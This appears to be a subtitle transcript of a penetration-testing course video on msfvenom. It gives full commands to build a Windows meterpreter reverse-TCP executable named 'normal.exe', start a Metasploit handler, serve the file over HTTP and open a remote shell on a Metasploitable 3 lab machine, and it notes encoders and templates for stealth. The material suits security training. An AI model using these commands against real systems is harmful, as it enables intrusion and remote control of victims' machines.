1 00:00:00,730 --> 00:00:10,270 So prior to msfvenom, there were msfpayload and msfencode that would help us to compose more
2 00:00:10,270 --> 00:00:11,260 stealthy payloads.
3 00:00:12,540 --> 00:00:18,650 Now, I want to start it like a fairy tale or a story, but it wasn't really that far back.
4 00:00:20,120 --> 00:00:29,420 The way I remember it, it was 2015 when msfvenom replaced both msfpayload and msfencode.
5 00:00:31,040 --> 00:00:32,750 Now, I really like this tool.
6 00:00:33,730 --> 00:00:35,920 As it's defined in its description:
7 00:00:37,100 --> 00:00:45,920 "A Metasploit standalone payload generator", so I think the guys from the Metasploit team deserve applause
8 00:00:45,920 --> 00:00:47,030 for this brilliant tool.
9 00:00:48,450 --> 00:00:52,420 At first glance, you might think it's a simple tool.
10 00:00:52,440 --> 00:00:53,100 What can it do?
11 00:00:54,160 --> 00:01:00,160 And yes, the power is derived from its simplicity and ease of use.
12 00:01:01,850 --> 00:01:07,370 However, it is very comprehensive when you examine its payloads, encoders and other capabilities.
13 00:01:08,470 --> 00:01:10,390 So let's have a look at how to use this tool.
14 00:01:12,480 --> 00:01:13,830 Open up a terminal tab.
15 00:01:15,240 --> 00:01:20,700 And simply type msfvenom --help to discover the tool.
16 00:01:22,140 --> 00:01:26,160 The help screen is pretty well defined and the parameters are well explained.
17 00:01:26,580 --> 00:01:29,490 So make sure that you become well acquainted with it.
18 00:01:30,530 --> 00:01:33,600 Now, you can define many properties for your payloads.
19 00:01:34,550 --> 00:01:40,700 You can add a NOP sled, avoid bad chars, even add custom code to your payloads.
20 00:01:41,660 --> 00:01:48,920 Also, msfvenom allows you to encode the payload and even lets you use an executable template to be
21 00:01:48,920 --> 00:01:53,780 stealthier. msfvenom supports all Metasploit payloads.
22 00:01:56,050 --> 00:02:01,540 So to list the available payloads, type msfvenom -l payloads.
23 00:02:04,270 --> 00:02:08,890 To list encoders, just type in msfvenom -l encoders.
24 00:02:10,170 --> 00:02:13,650 And you can do this for any of the architectures supported.
25 00:02:15,760 --> 00:02:16,810 For platforms.
26 00:02:19,840 --> 00:02:21,190 And for formats.
27 00:02:23,660 --> 00:02:28,040 With msfvenom, you have many ways to create a payload file.
28 00:02:29,120 --> 00:02:33,680 C, Python, ASPX and many other types.
29 00:02:35,260 --> 00:02:40,840 So you can use any payload with almost all options inside msfvenom.
30 00:02:42,170 --> 00:02:47,000 So type msfvenom -p and then the payload name.
31 00:02:51,440 --> 00:02:56,120 And to list the options for a payload, add --list-options.
32 00:02:58,300 --> 00:03:02,390 And here we have the description of the meterpreter reverse TCP payload.
33 00:03:03,490 --> 00:03:10,300 So while creating a payload-containing file, you can use all these options to build a more specific
34 00:03:10,300 --> 00:03:10,750 file.
35 00:03:11,990 --> 00:03:14,500 So now let's create a file from the very beginning.
36 00:03:17,050 --> 00:03:26,280 msfvenom -p, then the payload windows/x64/meterpreter/reverse_tcp.
37 00:03:27,650 --> 00:03:36,830 And payload options LHOST=10.10.10.11 LPORT=4441.
38 00:03:38,440 --> 00:03:41,140 --platform windows for Windows systems.
39 00:03:42,690 --> 00:03:47,940 -a x64 for 64-bit architectures.
40 00:03:49,190 --> 00:03:55,520 -f exe for Windows executables and finally, -o.
41 00:03:56,980 --> 00:03:58,270 For the output file there.
42 00:04:00,490 --> 00:04:02,010 normal.exe.
43 00:04:03,680 --> 00:04:11,450 OK, so my executable is now saved in the malware directory and I'll change the directory to Desktop/
44 00:04:11,840 --> 00:04:12,440 malware.
45 00:04:14,950 --> 00:04:18,460 Well, the normal.exe file resides here.
46 00:04:19,340 --> 00:04:21,440 So, file normal.exe.
47 00:04:22,560 --> 00:04:26,610 And see, there, you can tell that the file is a Windows executable.
48 00:04:27,910 --> 00:04:28,840 So now.
49 00:04:30,330 --> 00:04:34,020 Go to Metasploit and start a handler.
50 00:04:35:230 --> 00:04:38,470 use exploit/multi/handler.
51 00:04:39,970 --> 00:04:41,320 Set payload to.
52 00:04:42,490 --> 00:04:48,160 windows/x64/meterpreter/reverse_tcp.
53 00:04:49,560 --> 00:04:50,460 Set LHOST.
54 00:04:51,910 --> 00:05:02,230 To 10.10.10.11, set LPORT to 4441 and show the options again just to
55 00:05:02,230 --> 00:05:02,860 double check.
56 00:05:04,030 --> 00:05:05,520 Right, so everything looks good.
57 00:05:07,600 --> 00:05:09,340 exploit -j.
58 00:05:10,660 --> 00:05:14,020 And OK, so the handler started.
59 00:05:15,750 --> 00:05:17,490 So now I'm going to open up a new tab.
60 00:05:18,560 --> 00:05:22,580 And start a Python server from the malware directory.
61 00:05:23,460 --> 00:05:31,080 python -m SimpleHTTPServer on port 8000.
62 00:05:33,200 --> 00:05:35,450 Then I'm going to open Metasploitable 3.
63 00:05:36,850 --> 00:05:39,610 Start Internet Explorer and go to.
64 00:05:40,910 --> 00:05:48,650 http://10.10.10.11:8000.
65 00:05:50,830 --> 00:05:55,900 So this address will show the files in the malware directory on Kali.
66 00:05:57,080 --> 00:05:57,560 Now.
67 00:05:58,470 --> 00:06:00,870 Click the normal.exe to download.
68 00:06:02,350 --> 00:06:03,730 And save it to the desktop.
69 00:06:07,120 --> 00:06:10,300 OK, so let me just open msfconsole.
70 00:06:11,970 --> 00:06:16,180 On Metasploitable 3, run normal.exe by double clicking on it.
71 00:06:18,250 --> 00:06:20,890 On the left pane, you can see the session open.
72 00:06:23,070 --> 00:06:24,630 So type sessions.
73 00:06:25,550 --> 00:06:28,160 And this is it, on port 4441.
74 00:06:29,800 --> 00:06:33,490 So interact with session one, getuid.
75 00:06:35,590 --> 00:06:35,860 For.
76 00:06:37,680 --> 00:06:45,450 And there you have it, the basic usage of msfvenom, so you use a payload to generate a vulnerable
77 00:06:45,450 --> 00:06:49,710 file, then you deliver this file to the target.
78 00:06:50,610 --> 00:06:55,770 And then make the target run this file to connect back to the handler running on our Kali.
79 00:06:57,030 --> 00:07:03,870 So what I'll do is apply this logic in the next few videos as well, so strap on your seatbelt.
80 00:07:05,000 --> 00:07:06,170 We're going to go for a ride.